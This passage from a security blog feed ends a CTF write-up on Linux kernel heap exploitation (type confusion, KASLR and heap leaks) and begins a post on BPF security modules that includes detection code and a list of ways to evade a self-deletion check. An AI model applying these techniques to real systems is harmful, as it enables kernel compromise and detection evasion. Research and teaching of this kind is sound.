<p>We continue by preparing a favorable type confusion over the victim object.
<img src="/media/Linux-S1/seq_ops_reclaim.jpg" alt="" />
For that purpose, we allocate many <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/seq_file.h#L31"><code class="language-plaintext highlighter-rouge">seq_operations</code></a> structs after freeing the <code class="language-plaintext highlighter-rouge">user_key_payload</code>. The former is a well-known struct full of kernel function pointers that is allocated whenever <a href="https://elixir.bootlin.com/linux/v5.10.127/source/fs/seq_file.c#L561"><code class="language-plaintext highlighter-rouge">single_open</code></a> is called, e.g., when opening “/proc/self/stat”. As the two least significant bytes of a function pointer have now replaced the <code class="language-plaintext highlighter-rouge">datalen</code> of the <code class="language-plaintext highlighter-rouge">user_key_payload</code>, reading the key back gives us a substantial chunk of kernel heap data.</p>

<p><em>Aside: One neat optimization that we can do at this point is to start spraying as soon as the corruption has happened. The thread whose <code class="language-plaintext highlighter-rouge">poll_list</code> was corrupted can notice the fact by priming the <code class="language-plaintext highlighter-rouge">revents</code> of the last two <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/uapi/asm-generic/poll.h#L36"><code class="language-plaintext highlighter-rouge">pollfd</code></a> with a magic value. Usually, the kernel will overwrite them before returning.</em></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>for (walk = head; walk; walk = walk-&gt;next) {
	struct pollfd *fds = walk-&gt;entries;
	int j;

	for (j = walk-&gt;len; j; fds++, ufds++, j--)
		unsafe_put_user(fds-&gt;revents, &amp;ufds-&gt;revents, Efault);
}
</code></pre></div></div>
<p><em>However, when confusing the <code class="language-plaintext highlighter-rouge">user_key_payload</code> for a <code class="language-plaintext highlighter-rouge">poll_list</code> the <code class="language-plaintext highlighter-rouge">walk-&gt;entries</code> will be zero and the magic value will remain [<a href="https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/libexp/poll_stuff.c#L124">39</a>].</em></p>

<p>While the function pointer leak breaks kernel address space layout randomization (KASLR) we require more leaks in order to successfully finish our exploit.
<img src="/media/Linux-S1/kaslr.jpg" alt="" />
First, we would like to use our arbitrary free primitive again to cause a more powerful use-after-free, but for that to work, we need to know the address of an object to aim at. Second, the kernel image is not the only region that is affected by KASLR. There is also the kernel’s direct map and the array of <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/mm_types.h#L70"><code class="language-plaintext highlighter-rouge">page</code></a> structures used to manage it [<a href="https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html">40</a>]. We will make use of all those leaks later.</p>

<p>The good news is we can collect all those addresses in one sweep. In preparation for this step, we first free up some space in the affected slab by releasing all but the corrupted <code class="language-plaintext highlighter-rouge">user_key_payload</code>.
<img src="/media/Linux-S1/tty_leak.jpg" alt="" />
Opening a pseudo-terminal, i.e., “/dev/ptmx”, causes many allocations [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/drivers/tty/pty.c#L811">41</a>]. Two of those land in kmalloc-32 and can thus be exposed by our OOB read primitive. The first one is a <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/tty.h#L347"><code class="language-plaintext highlighter-rouge">tty_file_private</code></a>, which is part of a doubly linked list hanging off the <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/tty.h#L285"><code class="language-plaintext highlighter-rouge">tty_struct</code></a>, connecting it to all <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/fs.h#L916"><code class="language-plaintext highlighter-rouge">file</code></a>s open for it. Leaking its contents gives us the address of the <code class="language-plaintext highlighter-rouge">tty_struct</code> as well as a <code class="language-plaintext highlighter-rouge">file</code>, both of which are attractive targets for an arbitrary free [<a href="https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html">42</a>] [<a href="https://github.com/smallkirby/kernelpwn/blob/master/technique/tty_struct.md">43</a>]. The second one is caused by a call to <a href="https://elixir.bootlin.com/linux/v5.10.127/source/include/linux/mm.h#L763"><code class="language-plaintext highlighter-rouge">kvmalloc</code></a>, which internally allocates a small buffer to hold pointers to the <code class="language-plaintext highlighter-rouge">page</code>s it allocated [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/mm/vmalloc.c#L2478">44</a>]. We will elaborate on the conditions under which those leaks are sufficient to deduce the base address of the respective memory regions in the next post.</p>

<h2 id="wrap-up">Wrap Up</h2>

<p>We started our journey by setting up an exploit development environment, which we then used to interactively explore the challenge. After that, we reverse-engineered the vulnerable driver to discover an off-by-null bug. A brief introduction to the SLUB allocator and current heap exploitation methods was needed to understand and implement the technique used to turn the bug into an arbitrary free primitive. Finally, we exploited the arbitrary free to leak the base addresses of three separately randomized kernel memory regions and two heap-allocated kernel structures.</p>

<p>The above-mentioned video recording contains a live debugging session with all the exploit steps discussed here. You can try it out locally by installing the kernel debugging setup and compiling the exploit repository.</p>

<p>In the next post, we will, step-by-step, gain stronger exploit primitives, ending up with arbitrary kernel read/write or arbitrary code execution via ROP.</p>

<h2 id="references">References</h2>

<p>[0] https://www.youtube.com/playlist?list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t</p>

<p>[2] https://2022.cor.team/</p>

<p>[3] https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/tree/master/pwn/corjail</p>

<p>[4] https://syst3mfailure.io/corjail/</p>

<p>[5] https://github.com/0xricksanchez/like-dbg</p>

<p>[6] https://github.com/vobst/like-dbg-fork-public</p>

<p>[7] https://github.com/vobst/ctf-corjail-public</p>

<p>[8] https://android-developers.googleblog.com/2020/06/system-hardening-in-android-11.html</p>

<p>[9] https://www.llvm.org/docs/ScudoHardenedAllocator.html</p>

<p>[10] https://lwn.net/Articles/932201/</p>

<p>[11] https://en.wikipedia.org/wiki/Slab_allocation</p>

<p>[12] https://blogs.oracle.com/linux/post/linux-slub-allocator-internals-and-debugging-1</p>

<p>[13] https://events.static.linuxfound.org/sites/events/files/slides/slaballocators.pdf</p>

<p>[14] https://events.static.linuxfound.org/images/stories/pdf/klf2012_kim.pdf</p>

<p>[15] https://github.com/nccgroup/libslub</p>

<p>[16] https://github.com/PaoloMonti42/salt</p>

<p>[17] https://www.kernel.org/doc/Documentation/vm/slub.txt</p>

<p>[18] https://man7.org/linux/man-pages/man2/sched_setaffinity.2.html</p>

<p>[19] https://lwn.net/Articles/793427/</p>

<p>[20] https://etenal.me/archives/1825</p>

<p>[21] https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html</p>

<p>[22] https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game</p>

<p>[23] https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html</p>

<p>[24] https://github.com/sefcom/KHeaps</p>

<p>[25] https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html</p>

<p>[26] https://docs.google.com/document/d/1a9uUAISBzw3ur1aLQqKc5JOQLaJYiOP5pe_B4xCT1KA/edit#heading=h.nqnduhrd5gpk</p>

<p>[27] https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html</p>

<p>[28] https://man7.org/linux/man-pages/man2/poll.2.html</p>

<p>[29] https://zplin.me/papers/ELOISE.pdf</p>

<p>[30] https://github.com/smallkirby/kernelpwn/blob/master/structs.md#user_key_payload</p>

<p>[31] https://man7.org/linux/man-pages/man7/keyrings.7.html</p>

<p>[32] https://elixir.bootlin.com/linux/v5.10.127/source/security/keys/user_defined.c#L171</p>

<p>[33] https://duasynt.com/blog/linux-kernel-heap-spray</p>

<p>[34] https://elixir.bootlin.com/linux/v5.10.127/source/fs/xattr.c#L511</p>

<p>[35] https://man7.org/linux/man-pages/man7/xattr.7.html</p>

<p>[36] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L350C2-L362C18</p>

<p>[37] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L365C1-L383C1</p>

<p>[38] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/sploit.c#L294</p>

<p>[39] https://github.com/vobst/ctf-corjail-public/blob/1d3395b27644d79c90268ea32250953e2a3b7da3/libexp/poll_stuff.c#L124</p>

<p>[40] https://www.kernel.org/doc/html/v5.10/x86/x86_64/mm.html</p>

<p>[41] https://elixir.bootlin.com/linux/v5.10.127/source/drivers/tty/pty.c#L811</p>

<p>[42] https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html</p>

<p>[43] https://github.com/smallkirby/kernelpwn/blob/master/technique/tty_struct.md</p>

<p>[44] https://elixir.bootlin.com/linux/v5.10.127/source/mm/vmalloc.c#L2478</p>]]></content><author><name></name></author><summary type="html"><![CDATA[About a year ago, I remember watching a video series by LiveOverflow, a security researcher with a well-known Youtube channel, on him “getting into” browser exploitation [0]. Don’t ask me about any technical details, but what stuck with me is the way he describes how this video series came about; He reflects that he had been interested in the topic for quite a while, regularly annoying experienced researcher with the typical beginner question: “How do I get into it?”, but always just shying away from actually committing to leaning about it - thinking that the topic was too complex, the entry barrier to high.]]></summary></entry><entry><title type="html">LSMs Jmp’ing on BPF Trampolines</title><link href="https://blog.eb9f.de/2023/04/24/lsm2bpf.html" rel="alternate" type="text/html" title="LSMs Jmp’ing on BPF Trampolines" /><published>2023-04-24T00:00:00+00:00</published><updated>2023-04-24T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/04/24/lsm2bpf</id><content type="html" xml:base="https://blog.eb9f.de/2023/04/24/lsm2bpf.html"><![CDATA[<p>Back in 2001, the Linux Security Module (LSM) subsystem made its way
into the mainline kernel. Almost 10 years ago, in September 2014, the
modern BPF virtual machine (VM) landed in the tree. In late 2019, KP Singh
proposed a patchset that facilitates the creation of modules for the
former that run on the latter - Kernel Runtime Security Instrumentation
(KRSI) was born.</p>

<p>But how does kernel control flow transfer in and out of the VM at the
security checkpoints? Originally, this question was raised while
developing a memory forensics tool for detecting BPF-based malware,
but it quickly became a great learning experience about the internals
of the two subsystems. In this post, we will seek an answer to
that question, and then use it to develop a plugin that detects such hooks in memory images.</p>

<p>However, before we jump into assembly code, let’s briefly recap LSMs
and BPF.</p>

<h3 id="linux-security-modules">Linux Security Modules</h3>
<p>By default, Linux implements
<a href="https://en.wikipedia.org/wiki/Discretionary_access_control">discretionary access control</a>.
For example, the owner of a resource is free to grant others access
to it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ chmod 444 .ssh/id_rsa
</code></pre></div></div>
<p>This is potentially problematic, e.g., on multi-user systems where
users have different security clearances. To implement other access
control policies, e.g.,
<a href="https://en.wikipedia.org/wiki/Mandatory_access_control">mandatory access control</a>,
organizations like the National Security Agency (NSA) had to maintain
their own kernel patches.</p>

<p>At the <a href="https://lwn.net/2001/features/KernelSummit/">2001 Kernel Summit</a>
in San Jose, California, the NSA’s Peter
Loscocco presented their Security Enhanced Linux (SELinux); but the
patchset was not merged. However, one year later at the
<a href="https://lwn.net/Articles/3467/">Kernel Summit in Ottawa</a>,
Chris Wright presented the patch that would later become the Linux
Security Module subsystem.</p>

<p>Citing its documentation:</p>
<blockquote>
  <p>The LSM framework includes security fields in kernel data structures
and calls to hook functions at critical points in the kernel code to
manage the security fields and to perform access control. It also adds
functions for registering security modules. An interface
/sys/kernel/security/lsm reports a comma separated list of security
modules that are active on the system.
<a href="https://docs.kernel.org/security/lsm.html">link</a></p>
</blockquote>

<p>The framework is intended to be generic enough to facilitate the enforcement
of a wide range of security policies by writing a kernel module that
uses those two primitives. But writing kernel modules is hard,
mistakes can have catastrophic consequences, and the binary blobs only
run on the kernel they were compiled for - but fortunately there is…</p>

<p>Further reading:
<a href="https://www.usenix.org/conference/11th-usenix-security-symposium/linux-security-modules-general-security-support-linux">Linux Security Modules: General Security Support for the Linux Kernel</a></p>

<h3 id="modern-bpf">Modern BPF</h3>
<p>BPF is a VM inside the Linux kernel. It is used for
running programs in a sandboxed environment within the kernel context.</p>

<p>Programs can be written in C, Rust or even high-level scripting
languages. They are compiled to BPF bytecode, which can be dynamically
loaded into the kernel where it is statically verified before being
compiled to native code. Thus, running BPF programs is both safe, in the
sense that a programming mistake won’t crash your kernel, and
low-overhead. Furthermore, type information included in modern kernels
is used to relocate programs before loading, eliminating the need for
compilation on the target system.</p>

<p>By now, the VM is used in many different kernel subsystems, like
networking, tracing, security, cgroups or scheduling. In an effort to
provide a safer kernel programming environment, it is actively being
extended with new features.</p>

<p>Further reading:
<a href="https://docs.cilium.io/en/latest/bpf/">BPF and XDP Reference Guide</a></p>

<h3 id="kernel-runtime-security-instrumentation-krsi">Kernel Runtime Security Instrumentation (KRSI)</h3>
<p><a href="https://patchwork.kernel.org/project/linux-security-module/cover/20200329004356.27286-1-kpsingh@chromium.org/">This patchset</a>
added the option to implement the security callbacks
as programs for the BPF VM. For illustration purposes,
we are going to use a very simple security module that aims to detect
and prevent two common malware behaviors. You can find the full source
code <a href="https://github.com/vobst/golb-lsm2bpf/blob/master/mini_lsm.bpf.c">here</a>.</p>

<h4 id="fileless-executions">Fileless Executions</h4>
<p>Using a remote code execution exploit, an attacker might be able to
compromise a process running on a victim’s machine. Downloading and
executing a second stage payload without touching the filesystem might
be desirable due to security measures preventing the creation of (executable)
files or to minimize forensic artifacts. While userland exec is a
well-known technique, it is much more convenient to use Linux’s memfd
API. To detect such events, we can write the following BPF program and
attach it to the <code class="language-plaintext highlighter-rouge">bprm_creds_for_exec</code> security hook.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SEC</span><span class="p">(</span><span class="s">"lsm/bprm_creds_for_exec"</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">BPF_PROG</span><span class="p">(</span><span class="n">bprm_creds_for_exec</span> <span class="p">,</span> <span class="k">struct</span> <span class="n">linux_binprm</span><span class="o">*</span> <span class="n">bprm</span><span class="p">)</span>
<span class="p">{</span>
  <span class="kt">int</span> <span class="n">nlink</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
  <span class="kt">char</span> <span class="n">comm</span><span class="p">[</span><span class="n">BPF_MAX_COMM_LEN</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
  <span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="n">BPF_MAX_PATH_LEN</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

  <span class="n">nlink</span> <span class="o">=</span> <span class="n">bprm</span><span class="o">-&gt;</span><span class="n">file</span><span class="o">-&gt;</span><span class="n">f_path</span><span class="p">.</span><span class="n">dentry</span><span class="o">-&gt;</span><span class="n">d_inode</span><span class="o">-&gt;</span><span class="n">__i_nlink</span><span class="p">;</span> <span class="c1">// [1]</span>
  <span class="n">bpf_d_path</span><span class="p">(</span><span class="o">&amp;</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">file</span><span class="o">-&gt;</span><span class="n">f_path</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">path</span><span class="p">));</span>

  <span class="n">LOG_INFO</span><span class="p">(</span><span class="s">"path=%s nlink=%d"</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">nlink</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nlink</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">bpf_get_current_comm</span><span class="p">(</span><span class="n">comm</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">comm</span><span class="p">));</span>
    <span class="n">LOG_WARN</span><span class="p">(</span><span class="s">"fileless execution (%s:%lu)"</span><span class="p">,</span> <span class="n">comm</span><span class="p">,</span> <span class="n">bpf_ktime_get_boot_ns</span><span class="p">());</span>
    <span class="n">bpf_send_signal</span><span class="p">(</span><span class="n">SIGKILL</span><span class="p">);</span> <span class="c1">// [2]</span>
    <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// [3]</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This hook is called early during the exec system call and it receives
the file that the process wants to execute.
At [1] we get the number of hard links to this file. If it is zero, we
deny the execution [3] and queue a fatal signal for the process [2].
The latter is necessary since the hook is called before the syscall’s
<em>point-of-no-return</em>, after which all errors are fatal.</p>

<p>Note: You can use the
<a href="https://github.com/vobst/golb-lsm2bpf/blob/master/memfd_exec.c"><code class="language-plaintext highlighter-rouge">memfd_exec</code></a>
program to test this hook. It also allows you to experiment with the
differences between executing a script starting with #! and an ELF binary.</p>

<h4 id="self-deletion">Self-Deletion</h4>
<p>Less sophisticated malware might simply try to go memory-resident by
deleting its executable on disk. We can write another BPF program
and attach it to the <code class="language-plaintext highlighter-rouge">inode_unlink</code> security hook in an attempt to
prevent this behavior.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SEC</span><span class="p">(</span><span class="s">"lsm/inode_unlink"</span><span class="p">)</span>
<span class="kt">int</span> <span class="nf">BPF_PROG</span><span class="p">(</span><span class="n">inode_unlink</span><span class="p">,</span> <span class="k">struct</span> <span class="n">inode</span><span class="o">*</span> <span class="n">inode_dir</span><span class="p">,</span> <span class="k">struct</span> <span class="n">dentry</span><span class="o">*</span> <span class="n">dentry</span><span class="p">)</span>
<span class="p">{</span>
  <span class="k">struct</span> <span class="n">task_struct</span><span class="o">*</span> <span class="n">current</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="kt">char</span> <span class="n">comm</span><span class="p">[</span><span class="n">BPF_MAX_COMM_LEN</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
  <span class="k">const</span> <span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">exe_inode</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">,</span> <span class="o">*</span><span class="n">target_inode</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
  <span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

  <span class="n">target_inode</span> <span class="o">=</span> <span class="n">dentry</span><span class="o">-&gt;</span><span class="n">d_inode</span><span class="p">;</span> <span class="c1">// [1]</span>

  <span class="n">LOG_INFO</span><span class="p">(</span><span class="s">"target_inode=0x%lx"</span><span class="p">,</span> <span class="n">target_inode</span><span class="p">);</span>

  <span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
      <span class="n">current</span> <span class="o">=</span> <span class="n">bpf_get_current_task_btf</span><span class="p">(),</span>
      <span class="n">exe_inode</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">mm</span><span class="o">-&gt;</span><span class="n">exe_file</span><span class="o">-&gt;</span><span class="n">f_inode</span><span class="p">;</span> <span class="c1">// [2]</span>
      <span class="n">exe_inode</span> <span class="o">&amp;&amp;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">BPF_MAX_LOOP_SIZE</span><span class="p">;</span>
       <span class="n">i</span><span class="o">++</span><span class="p">,</span>
      <span class="n">current</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">current</span><span class="p">,</span> <span class="n">parent</span><span class="p">),</span>
      <span class="n">exe_inode</span> <span class="o">=</span> <span class="n">BPF_CORE_READ</span><span class="p">(</span><span class="n">current</span><span class="p">,</span> <span class="n">mm</span><span class="p">,</span> <span class="n">exe_file</span><span class="p">,</span> <span class="n">f_inode</span><span class="p">))</span>
  <span class="p">{</span>
    <span class="n">bpf_probe_read_kernel</span><span class="p">(</span><span class="o">&amp;</span><span class="n">comm</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">comm</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">comm</span><span class="p">);</span>
    <span class="n">LOG_INFO</span><span class="p">(</span><span class="s">"exe_inode=0x%lx comm=%s"</span><span class="p">,</span> <span class="n">exe_inode</span><span class="p">,</span> <span class="n">comm</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">target_inode</span> <span class="o">==</span> <span class="n">exe_inode</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [3]</span>
      <span class="n">bpf_get_current_comm</span><span class="p">(</span><span class="n">comm</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">comm</span><span class="p">));</span>
      <span class="n">LOG_WARN</span><span class="p">(</span><span class="s">"self-deletion (%s:%lu)"</span><span class="p">,</span> <span class="n">comm</span><span class="p">,</span> <span class="n">bpf_ktime_get_boot_ns</span><span class="p">());</span>
      <span class="n">bpf_send_signal</span><span class="p">(</span><span class="n">SIGKILL</span><span class="p">);</span>
      <span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>We attach this program to the <code class="language-plaintext highlighter-rouge">inode_unlink</code> hook, which is called each
time a process attempts to delete a file. The callback receives the
parent directory as well as the directory entry of the file that is to
be deleted. First, the <code class="language-plaintext highlighter-rouge">dentry</code> is used to obtain the underlying inode
[1]. Then, the loop reads the inode of the file that the process (or
any of its ancestors) is executing [2].
Finally, by comparing the two [3] we can attempt to detect
self-deletions.</p>

<p>Note: This program is flawed in many ways.
First, it breaks updates, e.g., when the package manager updates
systemd’s executable. Furthermore, it is easy to bypass, e.g.,</p>
<ul>
  <li>The parent deletes its child’s executable and exits. Then, the child
gets reparented and deletes the parent.</li>
  <li>Schedule removal through another task, e.g., <code class="language-plaintext highlighter-rouge">cron</code> or <code class="language-plaintext highlighter-rouge">systemd</code>.</li>
  <li>Use the <code class="language-plaintext highlighter-rouge">prctl</code> syscall to set the exe file.</li>
  <li>Scripts that are run by an interpreter are unaffected.</li>
  <li>Using <code class="language-plaintext highlighter-rouge">io_uring</code>’s asynchronous unlink requests in combination with a
dedicated kernel thread for processing them <em>might</em> (not tested) also
be an option.</li>
</ul>

<h2 id="bpf-trampolines-the-glue-between-c-and-bpf">BPF Trampolines: The glue between C and BPF</h2>
<p>Now that we got ourselves a small BPF-based security module to play
with, we can examine how it works under the hood.</p>

<h3 id="reaching-the-tramp">Reaching the tramp</h3>
<p>Let’s start by looking at the part of the infrastructure that is
statically compiled into the kernel. Figure 1 gives an overview of
the code path leading up to our BPF program.</p>

<p><img src="/media/lsm2bpf/call_chain_to_tramp.jpg" alt="Figure 1: Call chain leading up to BPF trampoline" /></p>

<p>At selected places, the kernel calls functions starting with
<code class="language-plaintext highlighter-rouge">security_</code>. For example, the <code class="language-plaintext highlighter-rouge">vfs_unlink</code> function calls
<code class="language-plaintext highlighter-rouge">security_inode_unlink</code> and aborts if it returns a nonzero value.
LSM hooks are meant to provide a higher level of abstraction than
system calls; thus it makes sense to place the gatekeeper call at
a choke point in the virtual file system (VFS) through which many operations
must pass, independently of their entry point into the kernel and the
type of object they are operating on.</p>

<p>Each of those call sites has its own member in the global
<code class="language-plaintext highlighter-rouge">security_hook_heads</code> structure. The <code class="language-plaintext highlighter-rouge">security_inode_unlink</code> function
uses its member to traverse a list of all registered callbacks, calling
them one by one. As soon as one of them returns a nonzero value it
aborts and propagates the value back to the caller.</p>

<p>There are numerous ways to find out where the indirect calls
lead us. For example, we can use <code class="language-plaintext highlighter-rouge">trace-cmd</code> with the function graph
tracer to record a trace of the functions called during an unlink
system call.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">touch</span> /tmp/hax <span class="o">&amp;&amp;</span> <span class="nb">sudo </span>trace-cmd record <span class="nt">-p</span> function_graph <span class="se">\</span>
<span class="nt">--max-graph-depth</span> 4 <span class="nt">-g</span> do_unlinkat <span class="nt">-n</span> <span class="s2">"*interrupt*"</span> <span class="nt">-n</span> <span class="s2">"*irq*"</span> <span class="se">\</span>
<span class="nt">-n</span> <span class="s2">"capable"</span> <span class="nt">-n</span> <span class="s2">"*__rcu*"</span> <span class="nt">-n</span> <span class="s2">"*_spin_*"</span> <span class="nt">-v</span> <span class="nt">-e</span> <span class="s2">"*irq*"</span> <span class="nt">-e</span> <span class="s2">"*sched*"</span> <span class="se">\</span>
<span class="nt">-F</span> /bin/rm /tmp/hax <span class="se">\</span>
<span class="o">&amp;&amp;</span> trace-cmd report trace.dat <span class="o">&amp;&amp;</span> <span class="nb">sudo </span>trace-cmd reset
...
rm-8004  <span class="o">[</span>011] 17857.021621: funcgraph_entry:                   |      security_inode_unlink<span class="o">()</span> <span class="o">{</span>
rm-8004  <span class="o">[</span>011] 17857.021621: funcgraph_entry:        0.129 us   |        bpf_lsm_inode_unlink<span class="o">()</span><span class="p">;</span>
rm-8004  <span class="o">[</span>011] 17857.021622: funcgraph_exit:         0.436 us   |      <span class="o">}</span>
...
</code></pre></div></div>
<p>Alternatively, we can debug the kernel on a guest VM and set a
breakpoint, e.g., on the function we suspect to be called. Looking at
the backtrace confirms the observation:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
(remote) gef➤  b bpf_lsm_inode_mkdir
Breakpoint 2 at 0xffffffff81230d80: file ./include/linux/lsm_hook_defs.h, line 126.
(remote) gef➤  c
...
(remote) gef➤  bt
#0  bpf_lsm_inode_mkdir (dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at ./include/linux/lsm_hook_defs.h:126
#1  0xffffffff814c56d0 in security_inode_mkdir (dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at security/security.c:1298
#2  0xffffffff8130488e in vfs_mkdir (mnt_userns=0xffffffff82e4e920 &lt;init_user_ns&gt;, dir=0xffff8880053f63a0, dentry=0xffff888005799480, mode=0x1ed) at fs/namei.c:4029
#3  0xffffffff81304a02 in do_mkdirat (dfd=0xffffff9c, name=0xffff8880075b1000, mode=0x1ed) at fs/namei.c:4061
#4  0xffffffff81304b7d in __do_sys_mkdir (pathname=&lt;optimized out&gt;, mode=&lt;optimized out&gt;) at fs/namei.c:4081
...
</code></pre></div></div>
<p>However, as we can see, the function usually does absolutely nothing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(remote) gef➤  x/5i $rip
=&gt; 0xffffffff81230d80 &lt;bpf_lsm_inode_mkdir&gt;:    endbr64
   0xffffffff81230d84 &lt;bpf_lsm_inode_mkdir+4&gt;:  nop    DWORD PTR [rax+rax*1+0x0]
   0xffffffff81230d89 &lt;bpf_lsm_inode_mkdir+9&gt;:  xor    eax,eax
   0xffffffff81230d8b &lt;bpf_lsm_inode_mkdir+11&gt;: ret
</code></pre></div></div>
<p>It exists for the sole purpose of being <em>ftrace</em> attachable! You might
have spotted the <code class="language-plaintext highlighter-rouge">nop</code> instruction at the very beginning: this one is
just reserving some space which allows the ftrace framework
to divert control flow by dynamically patching the kernel text.</p>

<p>We can see the patching machinery at work by placing a read-write
watchpoint on the nop’s address before attaching our program. It is hit multiple times during the attachment process, and when everything is
done, the <code class="language-plaintext highlighter-rouge">nop</code> is replaced by a call to a <em>BPF trampoline</em>.</p>

<h3 id="the-tramp">The Tramp</h3>
<p>BPF trampolines are the architecture-dependent glue that connects
native kernel functions to BPF programs. Currently only
<a href="https://elixir.bootlin.com/linux/v6.2.12/source/arch/arm64/net/bpf_jit_comp.c#L1964">arm64</a>
and
<a href="https://elixir.bootlin.com/linux/v6.2.12/source/arch/x86/net/bpf_jit_comp.c#L2128">x86</a>
support the generation of BPF trampolines.
Figures 2 and 3 show the stack frame and code of the generated trampoline,
respectively.</p>

<p><img src="/media/lsm2bpf/tramp_stack_frame.jpg" alt="Figure 2: Stack frame of the trampoline" />
<img src="/media/lsm2bpf/tramp_image.jpg" alt="Figure 3: Trampoline used for attaching LSM programs" /></p>

<p>Some values are burned into the trampoline upon generation; this
includes pointers to its metadata-holding <code class="language-plaintext highlighter-rouge">struct bpf_tramp_image</code>
as well as the <code class="language-plaintext highlighter-rouge">struct bpf_prog</code> of each program it leads up to. Local
variables are stored in the trampoline’s stack frame; most importantly,
the read-only context <code class="language-plaintext highlighter-rouge">ctx</code> received by the BPF programs lives on this
stack.</p>

<p>The execution of the trampoline begins by grabbing a percpu reference
(<code class="language-plaintext highlighter-rouge">percpu_ref</code>) to its image. This reference counts in-flight
executions, so the kernel knows when it is safe to free an old
trampoline image after an update.</p>

<p>Now comes the part where the trampoline calls into the jit-compiled BPF
programs one by one, handing each program a pointer to the stack-allocated
context holding the directory and the directory entry of the file to be
deleted as well as the return value of the previous BPF program.
While a BPF program is running it enters a read-copy-update (RCU) read-side critical
section and disables migration to other CPUs. Optionally, it might also
measure the execution time of the BPF program.</p>

<p>As soon as a program returns a nonzero value, the trampoline stops invoking
other programs and directly goes to its exit routine. Otherwise, it
calls the original function, i.e., <code class="language-plaintext highlighter-rouge">bpf_lsm_inode_unlink</code>, for its
side effects and return value once all BPF programs are finished.</p>

<p>Upon exit, the trampoline drops the reference to its image and returns directly
into the <code class="language-plaintext highlighter-rouge">security_inode_unlink</code> function by popping the extra return
address off the stack, propagating either the return value of the last BPF
program or that of the attached function.</p>

<p>Aside:
You probably already guessed that the utility of ftrace and BPF
trampolines is not limited to realizing KRSI.</p>

<p>In fact, we already saw another use of the ftrace framework: it’s the
